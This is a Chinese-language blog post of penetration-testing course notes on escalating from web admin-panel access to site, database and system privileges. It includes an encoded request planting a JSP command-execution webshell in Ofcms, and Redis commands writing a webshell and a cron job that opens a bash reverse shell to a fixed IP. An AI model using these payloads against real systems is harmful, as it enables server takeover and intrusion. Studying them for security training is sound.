第97天:权限提升-Web权限&权限划分&源码后台&中间件&第三方&数据库等

已于 2023-06-22 22:54:22 修改
阅读量749 收藏 2
点赞数
分类专栏: 权限提升 文章标签: 数据库 前端 中间件
于 2023-06-22 22:51:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46081990/article/details/131167837
版权

在这里插入图片描述

知识点梳理

#知识点:
1、前面-中期-后期对应知识关系
2、明确当前权限常见的获取方式
3、明确当前权限对应可操作事情
4、后台权限提升网站权限常规操作

#章节点:
1、Web权限提升
2、系统权限提升
3、域控权限提升

#详细点:
1、具体有哪些权限需要我们了解掌握的?
后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等

2、以上常见权限获取方法简要归类说明?
后台权限:SQL注入,数据库备份泄露,默认或弱口令等获取帐号密码进入
网站权限:后台提升至网站权限,RCE或文件操作类、反序列化等漏洞直达Shell
数据库权限:SQL注入,数据库备份泄露,默认或弱口令等进入或网站权限获取后转入
接口权限:SQL注入,数据库备份泄露,源码泄漏,培植不当等或网站权限获取后转入
系统权限:高危系统漏洞直达或网站权限提升转入、数据库权限提升转入,第三方转入等
域控权限:高危系统漏洞直达或内网横向渗透转入,域控其他服务安全转入等

3、以上常见权限获取后能操作的具体事情?
后台权限:
常规WEB界面文章分类等操作,后台功能可操作类
网站权限:
查看或修改程序源代码,可以进行网站或应用的配置文件读取(接口配置信息,数据库配置信息等),还能收集服务器操作系统相关的信息,为后续系统提权做准备。
数据库权限:
操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。也可以作为提升系统权限手段。
接口权限:
后台或网站权限后的获取途径:后台(修改配置信息功能点),网站权限(查看的配置文件获取),具体可以操作的事情大家自己想想。
系统权限:如同在你自己操作自己的电脑一样
域控权限:如同在你自己操作自己的虚拟机一样

演示案例

中间件语言类-权限-ASP&NET&PHP&JSP

第三方应用类-Phpmyadmin后台Getshell操作 

网站CMS源码类-Ofcms系统后台Getshell操作

Web容器中间件类-Tomcat平台后台Getshell操作

数据库服务类-Redis未授权管理终端Getshell操作

#中间件语言类-权限-ASP&NET&PHP&JSP
1、中间件语言:
JSP:Tomcat
ASP&NET:IIS
PHP:LAMP&软件
2、权限划分
Linux:
管理员UID为0:系统的管理员用户。
系统用户UID为1~999:Linux系统为了避免因某个服务程序出现漏洞而被黑客提权至整台服务器,默认服务程序会由独立的系统用户负责运行,进而有效控制被破坏范围。
普通用户UID从1000开始:是由管理员创建的用于日常工作的用户。
Windows:
用户及组:system administrator user guest等

#第三方应用类-Phpmyadmin后台Getshell操作
https://www.cnblogs.com/fzblog/p/13912387.html
低版本:直接导出后门 高版本:secure防护利用日志记录保存后门

#网站CMS源码类-Ofcms系统后台Getshell操作
利用后台已有功能点进行获取:SQL执行,文件上传,模版修改,外部引用等
1.明确功能点实现的意义是否满足网站权限的提升
2.不同的程序可以通过程序名版本进行网上公开资料利用
file_path=&dirs=%2F&res_path=res&file_name=../../static/jsp_shell.jsp&file_content=%3C%25%0A++++if(%22p0desta%22.equals(request.getParameter(%22pwd%22)))%7B%0A++++++++java.io.InputStream+in+%3D+Runtime.getRuntime().exec(request.getParameter(%22i%22)).getInputStream()%3B%0A++++++++int+a+%3D+-1%3B%0A++++++++byte%5B%5D+b+%3D+new+byte%5B2048%5D%3B%0A++++++++out.print(%22%3Cpre%3E%22)%3B%0A++++++++while((a%3Din.read(b))!%3D-1)%7B%0A++++++++++++out.println(new+String(b))%3B%0A++++++++%7D%0A++++++++out.print(%22%3C%2Fpre%3E%22)%3B%0A++++%7D%0A%25%3E

#Web容器中间件类-Tomcat平台后台Getshell操作
上传WAR包自动解析部署-JSP压缩ZIP后修改WAR后缀

#数据库服务类-Redis未授权管理终端Getshell操作
启动环境:/opt/redis-2.8.17# redis-server /etc/redis.conf
1.Webshell写入:
config set dir /home/wwwroot/default  #设置WEB写入目录
config set dbfilename test.php #设置写入文件名
set test "<?php phpinfo();?>"  #设置写入文件代码
bgsave                         #保存执行
save                           #保存执行
2.计划任务反弹shell
config set dir /var/spool/cron/crontabs #设置写入计划任务目录
config set dbfilename root #设置写入文件名
set xx "\n\n\n* * * * * bash -i >& /dev/tcp/47.75.212.155/3333 0>&1\n\n\n"  #设置写入文件代码
save         #保存执行
3.Redis RCE反弹shell
https://github.com/n0b0dyCN/redis-rogue-server
python redis-rogue-server.py --rhost=47.94.236.117 --lhost=47.75.212.155 --exp=exp.so
Ch4ser
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
权限提升——权限划分&web系统提权思路
m0_61506558的博客
01-08 745
查看或修改程序源代码,可以进行网站或应用的配置文件读取(接口配置信息、数据库配置信息等),还能收集服务器操作系统相关的信息,分析该网站的功能点,为后续系统提权做准备。操作数据库权限数据库的增删改查等,源码或配置文件泄露,也可能是网站权限(webshell)进行数据库的文件读取获得。后台网站权限后的获取途径:后台(修改配置信息功能点),网站权限(查看是配置文件获取)等。SQL注入,数据库备份泄露,源码泄露或配置不当等,网站权限获取后转入。高危漏洞或网站权限提升转入,数据库提权、第三方转入等。
97权限提升-Web 权限&权限划分&源码后台&中间件&第三方&数据库
最新发布
weixin_71529930的博客
05-21 886
jsp java安装的网站获得的权限一律是root system权限是由于语言特性导致的php案例redis获得apache(www)权限,而phpmyadmin获得的权限是amdin这是因为phpmyadmin是集成的软件,而redis非继承软件而是自己安装的除了java,jsp以外所有的语言获得的权限基本都是非root,system,都需要进行系统提权!
权限提升-Web权限提升篇&划分获取&资产服务&后台系统&数据库管理&相互转移
siu~
03-22 475
1、权限提升转移-分类&高低&场景 2、Web权限提升及转移-后台&数据库 3、后台权限及转移-转移对象&后台分类 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
中间件 判断用户是否拥有权限
qq_65102318的博客
03-15 512
检测权限路由 // 测试权限访问接口 Route::get('testPower', 'UserController/testPower')->middleware(\app\middleware\checkPowerMiddleware::class) ->middleware(\think\middleware\Throttle::class); // 访问频率限制 书写中间件内容,用用户ID获取权限id,判断是否拥有权限 // 根据用户角色判断是否具有权限
web权限管理
zhengholien的java净土
08-22 2958
什么是权限管理:对用户访问系统进行控制,按照安全规则、安全策略控制用户只能访问被授权的资源,一般包含认证和授权两部分。 权限管理基本流程图 用户认证:验证用户身份的合法性,即用户登录,常用的身份认证方法:1.帐号密码 2.指纹 3.证书 用户认证的相关概念 subject:主体,可以是用户,也可以是程序来访问我们的系统资源 principal:身份信息(帐号),通常是
高仿抖音短视频APP源码-支持直播&带原生安卓和ios源码&后台PHP-带安装教程
05-18
web后台配置 系统设置->公共设置 按上线环境配置域名地址 注意备注信息 系统设置->私密设置 按申请的第三方sdk平台账号自行修改 web后台使用宝塔最新版 宝塔安装 nginx + php 5.6 + mysql 5.7.23 + redis...
Android安卓应用源码-条码&二维码类源代码(9例).zip
10-23
这个压缩包"Android安卓应用源码-条码&二维码类源代码(9例).zip"提供了一个丰富的资源库,包含了九个不同的示例,帮助开发者深入理解和实践相关的编程技术。下面将详细介绍这些知识点: 1. **ZXing(Zebra ...
课设&大作业&毕设-安卓Android图书馆占座app设计毕业源码案例设计.zip
03-30
5. **网络编程**:学习者需要了解如何使用HttpURLConnection或者第三方库(如Retrofit、OkHttp)进行网络请求,实现与服务器的数据交换,如获取可用座位、提交占座请求等。 6. **JSON解析**:数据通常以JSON格式在...
.Net-毕业设计&课程设计之网络问卷调查系统源码(C#完整源码).zip
11-13
任何系统都要遵循系统设计的基本流程,本系统也不例外,同样需要经过市场进行调研,需求分析,概要设计,系统详细设计,测试和编码...系统选用B/S模式,使用.net开发框架C#开发语言进行开发, SQL Server为后台数据库
基于Python的Flask实现WEB后台权限管理系统源码+使用文档.zip
03-28
基于Python的Flask实现WEB后台权限管理系统源码+使用文档.zip基于Python的Flask实现WEB后台权限管理系统源码+使用文档.zip基于Python的Flask实现WEB后台权限管理系统源码+使用文档.zip基于Python的Flask实现WEB后台...
WEB通用权限管理系统源码
08-30
通用权限管理框架源码 2013-5-15更新功能: 1、菜单导航管理 2、操作按钮 3、角色管理 4、部门管理 5、用户管理(用户权限) 6、用户组管理(设置成员,用户组权限) 7、系统配置(动态配置系统参数) 8、附加属性(自定义属性) 9、系统日志(异常记录) 10、数据库备份/还原 11、资源管理,(动态数据库) 12、个人信息(基本信息,附加信息,用户角色,拥有权限) 13、首页快捷 14、数据回收站(业务功能删除过数据,全部保留在回收站) 15、系统个性化设置(切换菜单导航) 2012-9-10更新内容: 系统UI,给人感觉非常好,体积小巧,速度快 该源码是适用用于应用系统后台模块的管理(可扩展至支持集中化的权限管理平台), 0.支持N级菜单导航,菜单显示方式支持目前支持2种模式分别:菜单(无限级),横向(2级) 1.动态切换皮肤,目前有两狂UI 蓝色,咖啡色 2.表单验证,文本框高亮起来 3.可以动态分配权限按钮,分配角色权限,目录结构,栏目的链接都可以修改。权限管理非常灵活, 4.可以隐藏左侧导航栏,打开左侧导航栏,默认是打开,table表格都自应大小的 5.动态创建数据表,删除用户表,点击数据 表 可以查询字段信息 6.可以直接执行sql脚本 7.兼容 IE6,7,8,9 /Firefox /Google Chrome 这些浏览器都测试过 8.批量删除,自定义复选框样式,可以全选/反选 9.角色分级,集团和分公司的关系 10.权限 横向就是业务部分,具体负责哪块业务,纵向是级别 11.动态报表设置,并且可以导出Excel 12.登陆日记,操作日记,异常日记 13.海量批量删除数据库,调用公共存储过程,参数,表明,主键 特点: UI:传统html css,美观 漂亮 大方 实用 js框架:jquery 系统大部分使用AJAX操作。大大提高了用户体验 功能描述: 1.支持N级菜单导航,菜单显示方式支持目前支持2种模式分别: 菜单(无限级),横向(2级) 2.表单验证,文本框高亮起来 3.可以动态分配权限按钮,分配角色权限,目录结构,栏目的链接都可以修改。 4.可以隐藏左侧导航栏,打开左侧导航栏,默认是打开,table表格都自应大小的 5.动态创建数据表,删除用户表,点击数据 表 可以查询字段信息 6.可以直接执行sql脚本
javaweb 通用权限管理系统
01-07
本系统是使用传统mvc设计模式开发,比较适合javaweb的初学者,代码有注释,通俗易懂。
java web实现用户权限管理
09-03
主要介绍了java web实现用户权限管理,设计并实现一套简单的权限管理功能,感兴趣的小伙伴们可以参考一下
WEB项目中的权限管理(一)
qq_40981282的博客
07-08 1142
自定义安全配置的加载机制 前提 基于自身业务需要 按照面向对象的思想,我们至少应该有权限(Privilege)和用户(User)实体。两个实体足够了吗?细想一下,如果我们有多个用户,多个用户也有多个权限,当要为用户授权的时候,这样子就会非常麻烦!所以我们应该引入角色(Role)这个实体! 引入角色(Role)这个实体方便在哪呢??把权限赋给角色(比如:把删除、修改的权限给管理员这个角色),管理员这...
JAVA WEB项目中的功能权限和数据权限设计
cyh的博客
02-01 3951
功能权限 1.介绍 每个controller接口,对应权限表一条记录。项目启动时,通过springmvc提供的类,可以获取到有权限注解的方法,从而构造权限对象,插入数据库。 2.代码 接口注解 权限初始化类 @Component @Slf4j public class FunInitConfig implements CommandLineRunner { @Autowired private BdpFuncMapper bdpFuncMapper; @Autowired
Spring Boot实践:Web、数据访问与权限管理的深度整合
沐雨风栉
05-27 995
在Java开发环境中,Spring Boot是一个领军的框架,特别是当我们讨论创建快速、可读和生产级别的应用程序时。下面,我们会深入研究Spring Boot如何与Web开发,数据访问以及权限控制进行整合。
Web安全】访问控制
RexHa的博客
12-21 1260
系统只验证了能访问数据的角色,既没有对角色内的用户做细分,也没有对数据的子集做细分,因此缺乏一个用户到数据之间的对应关系。在RBAC这种“基于角色的访问控制”的模型下,系统只会验证用户A是否属于角色RoleX,而不会判断用户A是否只能访问只属于用户B的数据DataB,因此,发生了越权访问,这种问题我们就称为“水平权限管理问题”RBAC事先在系统中定义出不同的角色,不同角色有不同权限,一个用户可能拥有多个角色,角色之间有高低之分,在系统验证权限时,只需要验证用户所属的角色,再根据角色的权限进行授权。
Web设计中的常用权限设计模型
tlqwanttolearnit的博客
07-19 486
常用的权限设计模型包括 RBAC、ABAC 和 ACL,它们在实现权限控制方面有各自的原理和设计模型。ACL 模型包含资源列表和用户列表。资源列表维护每个资源的访问控制列表,用户列表包含每个用户对应的访问权限。ACL 是一种基于列表的访问控制模型,为每个资源定义了一个访问控制列表,该列表包含了对该资源的访问权限。RBAC 是一种基于角色的访问控制模型,通过将权限分配给角色,再将角色分配给用户来实现权限管理。策略定义了访问决策的规则,属性描述了用户、资源和环境等相关信息,评估引擎根据策略和属性进行访问决策。
管理系统权限
每天都要努力学习哦~~
08-17 1048
登录:当用户填写完账号和密码后向服务端验证是否正确,验证通过之后,服务端会返回一个token,拿到token之后(我会将这个token存贮到cookie中,保证刷新页面后能记住用户登录状态),前端会根据token再去拉取一个user_info的接口来获取用户的详细信息(如用户权限,用户名等等信息)。权限验证:通过token获取用户对应的role,动态根据用户的 role 算出其对应有权限的路由,通过动态挂载这些路由。......
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值